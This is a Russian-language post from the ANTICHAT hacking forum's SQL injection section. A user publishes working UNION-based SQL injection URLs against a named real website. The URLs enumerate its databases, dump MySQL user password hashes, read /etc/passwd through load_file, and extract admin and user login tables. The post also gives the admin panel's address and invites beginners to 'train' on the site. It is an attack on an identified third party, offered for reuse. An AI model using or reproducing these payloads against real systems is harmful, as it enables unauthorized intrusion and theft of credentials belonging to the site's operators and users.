HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу SQL Инъекции
   
 
 
Опции темы Поиск в этой теме Опции просмотра
Предыдущая Предыдущее сообщение   Следующее сообщение Следующая

  #11  
Старый 06.08.2008, 00:44
MirA
Новичок
Регистрация: 24.07.2008
Сообщений: 29
Провел на форуме:
109513

Репутация: 52
Post
http://www.disasterinfo.mn

version() = 5.0.22-Debian_0ubuntu6.06-log
user() = root@localhost
database() = forum

смотрим все таблички
Цитата:
http://www.disasterinfo.mn/forum/answer_input.php?id=12+union+select+1,table_name,3 ,4,5+from+information_schema.tables/*
теперь смотрим все базы
Цитата:
http://www.disasterinfo.mn/forum/answer_input.php?id=12+union+select+1,table_schema ,3,4,5+from+information_schema.tables/*
есть хорошие таблички disasterinfo.users, main_data2.admin

так же есть доступ к mysql.user
Цитата:
http://www.disasterinfo.mn/forum/answer_input.php?id=12+union+select+1,concat_ws(0x 3a,user,password),3,4,5+from+mysql.user/*
есть права на чтение файлов)
Цитата:
http://www.disasterinfo.mn/forum/answer_input.php?id=12+union+select+1,2,load_file( 0x2f6574632f706173737764),4,5+from+main_data2.admi n/*
переходим к таблицам...
таблица с админами:
Цитата:
http://www.disasterinfo.mn/forum/answer_input.php?id=12+union+select+1,concat_ws(0x 3a,id,name,pass,email),3,4,5+from+main_data2.admin/*
таблица с юзерами :
Цитата:
http://www.disasterinfo.mn/forum/answer_input.php?id=12+union+select+1,concat_ws(0x 3a,nickname,password),3,4,5+from+disasterinfo.user s/*
админка тут http://www.disasterinfo.mn/admin/

прекрасная база,для тренировки новичкам)
спасибо за внимание)
 
Ответить с цитированием
 



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.